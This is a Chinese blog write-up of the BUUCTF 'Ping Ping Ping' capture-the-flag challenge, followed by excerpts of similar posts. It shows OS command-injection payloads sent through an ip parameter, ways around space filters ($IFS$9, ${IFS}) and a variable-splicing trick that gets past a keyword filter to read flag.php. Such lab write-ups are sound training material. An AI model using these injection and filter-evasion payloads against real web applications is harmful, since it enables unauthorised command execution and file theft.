BUUCTF-Ping Ping Ping

最新推荐文章于 2024-06-06 16:58:38 发布
最新推荐文章于 2024-06-06 16:58:38 发布
阅读量111 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47571887/article/details/121196616
版权

打开题目,emm我们试试用get方式提交一下

用url/?id=127.0.0.1;ls

查看一波flag,url/?id=127.0.0.1;cat flag.php

 

 ???貌似过滤掉了,那我们看看index.php

好像是把空格过滤掉了,这里我用了很多方法进行绕过,发现只有第四种可以绕过

1、<>

2、%20(space)

3、%09(tab)

4、$IFS$9、 ${IFS}、$IFS

这里好像也把flag给过滤了,我们去看看index.php

发现过滤了很多东西,好在看到了最后一个$a变量,

构造payload:

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

貌似没啥用,卡了半天,发现在源码里。

 

 

 

八哥不爱做题
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5096
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
http-ping工具
12-03
-h header-line Pass the given header line as-is in each ping request. For example, add a host header like this: -h \"Host: www.site1.com\" Be sure to surround the header-line with quotes. You can ...
Buuctf Ping Ping Ping
Dexret的博客
12-06 572
打开该靶机 判断该题需要我们传参进去,加上标题提示,应该为命令注入题目 输入ls查看目录 发现有个flag.php文件 查看该flag.php文件,发现空格都被过滤掉了 利用$IFS$1替代空格,发现flag也被过滤掉了 查看一下index.php 发现该题过滤了很多东西 这里我们可以利用linux中反引号的内联执行来做这道题 linux中cat `ls`,会直接输出目录下文件内的内容 payload ?ip=127.0.0.1|cat$IFS$1`ls`..
CTF演练---ping
最新发布
2301_78637299的博客
06-06 476
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
buuctf-ping ping ping
m0_62094846的博客
11-15 647
ping地址成功了,再看看目录 直接有flag,尝试使用,但是过滤了空格 绕过空格方式 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt (28条消息) Linux下绕过空格的方式总结_北陌的CSDN博客-CSDN博客_空格绕过 一个个尝试 发现t$IFS$9有用 但是又过滤了flag,那没有办法再绕过了,只能试试index.php 可...
BUUCTFPing Ping Ping
金 帛的博客
02-20 6797
BUUCTFWP,关于一些waf的绕过
BUUCTF ping ping ping
vsdvscs的博客
05-10 176
BUUCTF ping ping ping 打开场景的时候我是一脸懵逼的那就看看源码吧还是一脸懵逼。 可以继续懵逼。 那既然人家人家都让我们ping ping ping了那就ping一下吧(使用GET方法传递的ip地址) 返回了一个我们平时用cmd也可以实现的作用,那么就猜想一下,我们尝试去直接凭借一下命令让他把flag给我们打印出来(domg,domg) 抱着满心的欢喜然后给我返回了一个这个: 看来这样是不能成功了(大概率是他过滤了一些东西·) 所以我们不能过执行命令,那
window下可用的arp-ping工具
01-03
ARP-Ping工具在Windows操作系统中的应用 在计算机网络中,ARP(Address Resolution Protocol,地址解析协议)是一个重要的底层协议,用于将IP地址映射到物理MAC地址,以便数据能够在网络中正确传输。ARP-Ping是一种...
node-net-ping:网平
06-15
该模块实现了对ICMP Echo (ping) 支持。 此模块使用: npm install net-ping 它使用require()函数加载: var ping = require ("net-ping"); 然后可以创建一个 ping 会话来 ping 或跟踪到许多主机的路由: var...
python-ping:python ping
05-03
Python平使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] hostpositional arguments: host Target hostoptional arguments: -h, --help ...
Delphi-Ping.rar_delphi ping
09-19
在IT行业中,网络通信是至关重要的部分,而`Ping`命令是网络诊断工具中的基本元素。`Ping`用于检查网络连接是否畅通,通过发送ICMP(Internet Control Message Protocol)回显请求报文来验证两台计算机之间的网络...
BUUCTF——ping ping ping
weixin_62248541的博客
11-28 243
BUUCTF——ping ping ping
buuctf-Ping Ping Ping
Sacrifice_li的博客
09-25 1794
进来页面简单粗暴,就知道是个命令注入了: 那没什么好说的,就一个个测试呗 依据命令注入来看,最常见的是ls和pwd,发现均可以执行,发现在当前目录下存在一个flag.php以及index.php 在未打开index.php之前发现: ①没有过滤 ; | 以及|| ②过滤的内容有:" ",(),<>,\,/ 以及空格 做到这里实际上我就卡住了,我尝试了各种方式譬如:%0,%00,\0,/0./**/,来绕过空格过滤发现都不行,接着去网上搜索了一下如何绕过bash的空格过滤...
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1803
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2744
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 798
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
Buuctf [GXYCTF2019]Ping Ping Ping
qq_52718293的博客
06-07 168
打开之后是一个ping的命令,我们可以先尝试着试一下ping命令 发现确实是有回显的,我们可以先查看一下目录,ls一下 发现有两文件,有一个flag.php 然后我们可以尝试一下cat flag.php 尝试之后发现是过滤了空格,准备用/* */绕过空格,然后就。。。发现又被过滤了 然后我准备换一个绕过空格%09 然后又发现被过滤了,不过这次是flag被过滤了 既然遇到了空格过滤,那小瑶就稍稍总结一下绕过空格 ${IFS}替换 $IFS$1替换 ${IFS替换 %20替换 <和<>重
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1238
BUUctf [GXYCTF2019]Ping Ping Ping
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值